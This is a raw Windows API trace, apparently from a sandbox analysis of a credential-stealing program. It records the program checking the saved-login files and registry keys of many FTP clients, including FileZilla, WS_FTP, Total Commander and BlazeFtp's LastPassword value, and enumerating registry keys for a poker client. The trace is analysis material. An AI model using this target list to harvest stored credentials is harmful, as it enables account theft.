[0147.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.002] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 0 [0147.003] GetProcessHeap () returned 0x690000 [0147.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.003] GetProcessHeap () returned 0x690000 [0147.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f78) returned 0x6ab2f8 [0147.004] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.004] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\FileZilla\\sitemanager.xml", arglist=0x19fb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 63 [0147.004] GetProcessHeap () returned 0x690000 [0147.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0147.004] GetProcessHeap () returned 0x690000 [0147.005] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.005] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 0 [0147.006] GetProcessHeap () returned 0x690000 [0147.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.006] GetProcessHeap () returned 0x690000 [0147.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.007] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.007] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0147.007] GetProcessHeap () returned 0x690000 [0147.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6c) returned 0x6ab2f8 [0147.008] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.008] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\Staff-FTP\\sites.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 42 [0147.008] GetProcessHeap () returned 0x690000 [0147.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x58) returned 0x6a8db8 [0147.008] GetProcessHeap () returned 0x690000 [0147.009] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.009] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 0 [0147.010] GetProcessHeap () returned 0x690000 [0147.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.010] GetProcessHeap () returned 0x690000 [0147.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.010] GetProcessHeap () returned 0x690000 [0147.010] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f68) returned 0x6ab2f8 [0147.011] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.012] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\BlazeFtp\\site.dat", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 55 [0147.012] GetProcessHeap () returned 0x690000 [0147.012] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x72) returned 0x6a76f0 [0147.012] GetProcessHeap () returned 0x690000 [0147.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.014] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 0 [0147.014] GetProcessHeap () returned 0x690000 [0147.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a76f0 | out: hHeap=0x690000) returned 1 [0147.015] GetProcessHeap () returned 0x690000 [0147.015] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6aa2c8 [0147.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.016] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\FlashPeak\\BlazeFtp\\Settings", pszValue="LastPassword", pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fb3c*=0x104 | out: pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fb3c*=0x104) returned 0x2 [0147.016] GetProcessHeap () returned 0x690000 [0147.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.017] GetProcessHeap () returned 0x690000 [0147.017] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.018] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.018] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0147.018] GetProcessHeap () returned 0x690000 [0147.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6ab2f8 [0147.019] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.030] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\Fastream NETFile\\My FTP Links", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 52 [0147.030] GetProcessHeap () returned 0x690000 [0147.030] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6c) returned 0x6a8db8 [0147.030] GetProcessHeap () returned 0x690000 [0147.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.032] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 0 [0147.032] GetProcessHeap () returned 0x690000 [0147.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.033] GetProcessHeap () returned 0x690000 [0147.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.033] GetProcessHeap () returned 0x690000 [0147.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.034] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.035] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0147.035] GetProcessHeap () returned 0x690000 [0147.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f82) returned 0x6ab2f8 [0147.035] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.036] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\GoFTP\\settings\\Connections.txt", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 53 [0147.036] GetProcessHeap () returned 0x690000 [0147.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6e) returned 0x6a8db8 [0147.036] GetProcessHeap () returned 0x690000 [0147.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.038] PathFileExistsW (pszPath="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 0 [0147.038] GetProcessHeap () returned 0x690000 [0147.038] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.038] GetProcessHeap () returned 0x690000 [0147.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.039] GetProcessHeap () returned 0x690000 [0147.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f76) returned 0x6ab2f8 [0147.040] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.041] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\Estsoft\\ALFTP\\ESTdb2.dat", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 62 [0147.041] GetProcessHeap () returned 0x690000 [0147.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x80) returned 0x6a8db8 [0147.041] GetProcessHeap () returned 0x690000 [0147.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.042] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 0 [0147.043] GetProcessHeap () returned 0x690000 [0147.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.043] GetProcessHeap () returned 0x690000 [0147.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.044] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.045] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0147.045] GetProcessHeap () returned 0x690000 [0147.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6c) returned 0x6ab2f8 [0147.046] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.047] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\DeluxeFTP\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 42 [0147.047] GetProcessHeap () returned 0x690000 [0147.047] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x58) returned 0x6a8db8 [0147.047] GetProcessHeap () returned 0x690000 [0147.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.048] PathFileExistsW (pszPath="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 0 [0147.049] GetProcessHeap () returned 0x690000 [0147.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.049] GetProcessHeap () returned 0x690000 [0147.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.049] GetProcessHeap () returned 0x690000 [0147.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.050] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.051] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Windows") returned 0x0 [0147.052] GetProcessHeap () returned 0x690000 [0147.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5c) returned 0x6ab2f8 [0147.054] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.055] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\wcx_ftp.ini", arglist=0x19fb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0147.055] GetProcessHeap () returned 0x690000 [0147.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x30) returned 0x6a6db0 [0147.055] GetProcessHeap () returned 0x690000 [0147.055] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.056] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0147.057] GetProcessHeap () returned 0x690000 [0147.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6db0 | out: hHeap=0x690000) returned 1 [0147.057] GetProcessHeap () returned 0x690000 [0147.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.058] GetProcessHeap () returned 0x690000 [0147.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5c) returned 0x6ab2f8 [0147.059] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.060] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\wcx_ftp.ini", arglist=0x19fb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0147.060] GetProcessHeap () returned 0x690000 [0147.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x66) returned 0x6a8db8 [0147.060] GetProcessHeap () returned 0x690000 [0147.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.061] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0147.062] GetProcessHeap () returned 0x690000 [0147.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.062] GetProcessHeap () returned 0x690000 [0147.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.063] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.064] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0147.064] GetProcessHeap () returned 0x690000 [0147.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5c) returned 0x6ab2f8 [0147.064] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.065] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\wcx_ftp.ini", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0147.065] GetProcessHeap () returned 0x690000 [0147.065] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x46) returned 0x6ab158 [0147.065] GetProcessHeap () returned 0x690000 [0147.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.072] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0147.072] GetProcessHeap () returned 0x690000 [0147.073] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab158 | out: hHeap=0x690000) returned 1 [0147.073] GetProcessHeap () returned 0x690000 [0147.073] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.074] GetProcessHeap () returned 0x690000 [0147.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6c) returned 0x6ab2f8 [0147.075] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.076] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0147.076] GetProcessHeap () returned 0x690000 [0147.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x76) returned 0x6a7770 [0147.076] GetProcessHeap () returned 0x690000 [0147.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.078] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0147.078] GetProcessHeap () returned 0x690000 [0147.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7770 | out: hHeap=0x690000) returned 1 [0147.078] GetProcessHeap () returned 0x690000 [0147.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6aa2c8 [0147.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.079] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fb74*=0x104) returned 0x2 [0147.079] GetProcessHeap () returned 0x690000 [0147.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.080] GetProcessHeap () returned 0x690000 [0147.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.081] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.081] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0147.081] GetProcessHeap () returned 0x690000 [0147.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6ab2f8 [0147.082] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.083] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\FTPGetter\\Profile\\servers.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 52 [0147.083] GetProcessHeap () returned 0x690000 [0147.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6c) returned 0x6a8db8 [0147.083] GetProcessHeap () returned 0x690000 [0147.083] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.085] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 0 [0147.085] GetProcessHeap () returned 0x690000 [0147.085] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.085] GetProcessHeap () returned 0x690000 [0147.085] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.086] GetProcessHeap () returned 0x690000 [0147.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f70) returned 0x6ab2f8 [0147.086] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.087] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\FTPGetter\\servers.xml", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 59 [0147.087] GetProcessHeap () returned 0x690000 [0147.087] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6a8db8 [0147.087] GetProcessHeap () returned 0x690000 [0147.088] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.089] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 0 [0147.089] GetProcessHeap () returned 0x690000 [0147.089] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.090] GetProcessHeap () returned 0x690000 [0147.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.090] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.091] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0147.091] GetProcessHeap () returned 0x690000 [0147.091] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f68) returned 0x6ab2f8 [0147.092] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.093] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\WS_FTP\\WS_FTP.INI", arglist=0x19fb9c | out: param_1="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 40 [0147.093] GetProcessHeap () returned 0x690000 [0147.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x54) returned 0x6a8db8 [0147.093] GetProcessHeap () returned 0x690000 [0147.093] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.094] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 0 [0147.095] GetProcessHeap () returned 0x690000 [0147.095] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.095] GetProcessHeap () returned 0x690000 [0147.095] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.095] GetProcessHeap () returned 0x690000 [0147.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.097] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.097] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Windows") returned 0x0 [0147.097] GetProcessHeap () returned 0x690000 [0147.097] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5a) returned 0x6ab2f8 [0147.098] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.099] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\WS_FTP.INI", arglist=0x19fb90 | out: param_1="C:\\Windows\\WS_FTP.INI") returned 21 [0147.099] GetProcessHeap () returned 0x690000 [0147.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x2e) returned 0x6a6918 [0147.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.101] PathFileExistsW (pszPath="C:\\Windows\\WS_FTP.INI") returned 0 [0147.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6918 | out: hHeap=0x690000) returned 1 [0147.102] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.102] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.103] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0147.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f56) returned 0x6ab2f8 [0147.104] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.105] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\Ipswitch", arglist=0x19fb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 46 [0147.105] GetProcessHeap () returned 0x690000 [0147.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x60) returned 0x6a8db8 [0147.105] GetProcessHeap () returned 0x690000 [0147.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.106] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 0 [0147.107] GetProcessHeap () returned 0x690000 [0147.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.107] GetProcessHeap () returned 0x690000 [0147.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.107] GetProcessHeap () returned 0x690000 [0147.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.113] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.114] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0147.114] GetProcessHeap () returned 0x690000 [0147.114] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f56) returned 0x6ab2f8 [0147.115] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.115] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\site.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 30 [0147.116] GetProcessHeap () returned 0x690000 [0147.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4100 [0147.116] GetProcessHeap () returned 0x690000 [0147.116] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0147.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.117] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 0 [0147.117] GetProcessHeap () returned 0x690000 [0147.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4100 | out: hHeap=0x690000) returned 1 [0147.118] GetProcessHeap () returned 0x690000 [0147.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.134] GetProcessHeap () returned 0x690000 [0147.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6a4b48 [0147.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.136] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software", phkResult=0x6a4b48 | out: phkResult=0x6a4b48*=0x210) returned 0x0 [0147.136] GetProcessHeap () returned 0x690000 [0147.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6aa2c8 [0147.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.137] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x0, pszName=0x6aa2c8, pcchName=0x19fb90 | out: pszName="AppDataLow", pcchName=0x19fb90) returned 0x0 [0147.137] GetProcessHeap () returned 0x690000 [0147.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6a9020 [0147.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.139] RegOpenKeyW (in: hKey=0x210, lpSubKey="AppDataLow", phkResult=0x6a9020 | out: phkResult=0x6a9020*=0x204) returned 0x0 [0147.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.140] StrStrW (lpFirst="AppDataLow", lpSrch="Full Tilt Poker") returned 0x0 [0147.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.141] RegCloseKey (hKey=0x204) returned 0x0 [0147.142] GetProcessHeap () returned 0x690000 [0147.142] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9020 | out: 